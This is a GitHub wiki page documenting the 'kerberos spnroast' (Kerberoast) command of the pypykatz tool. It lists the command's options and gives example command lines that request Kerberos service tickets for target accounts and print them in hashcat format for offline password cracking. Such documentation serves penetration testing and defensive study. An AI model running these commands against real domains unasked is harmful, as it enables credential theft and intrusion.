-
Notifications
You must be signed in to change notification settings - Fork 386
Kerberos spnroast command
skelsec edited this page Apr 15, 2021
·
3 revisions
Performs the SPNroast (aka kerberoast) attack against a list of users
The list of users can be in a file (one username per line) or can be set in a command line argument (at the end of the command). You may even mix the two.
Important: The expected format is <user>@<realm> but you don't need to specify the target users using this format if you with, just the username is enough IF you also supply the -d <realm> switch.
You will need the following things:
- Credentials of the user. This credential can be the
passwordorNT hashor secret keyRC4/AES128/AES256 - A list of usernames prone to spnroast attack
- Instead of targets and realm you can use LDAP connection string to load the targets automatically
None
-
-o: Writes the result to a file -
-d:Realmaka domain name -
-e: Specifies which encryption type should be requested. Default is RC4 (23) -
-tor--targets: Targets to be loaded from file or as SPN string, or just username if-dis set. -
-lor--ldap: LDAP URL in ConnectionURL format. This will fetch the targets from the DC via LDAP. -
url: Kerberos URL in ConnectionURL format.
-
pypykatz kerberos spnroast 'kerberos+password://TEST\victim:[email protected]' -t [email protected]: Performs the kerberoast attack against user[email protected]. Output will be printed to console in hashcat format -
pypykatz kerberos spnroast 'kerberos+password://TEST\victim:[email protected]' -d test.corp -t srv_http: Same as above but this time the username and realm was specified separately -
pypykatz kerberos spnroast 'kerberos+password://TEST\victim:[email protected]' -d test.corp -t vulnerable_users.txt: Same as above but the target users are fetched from thevulnerable_users.txtfile -
pypykatz kerberos spnroast 'kerberos+password://TEST\victim:[email protected]' -e 18 [email protected]: Same as the first command but the encryption type is changed to AES256. (just an example, dont do this) -
pypykatz kerberos spnroast 'kerberos+password://TEST\victim:[email protected]' -l 'ldap+ntlm-password://TEST\victim:[email protected]': sproast against targets loaded via LDAP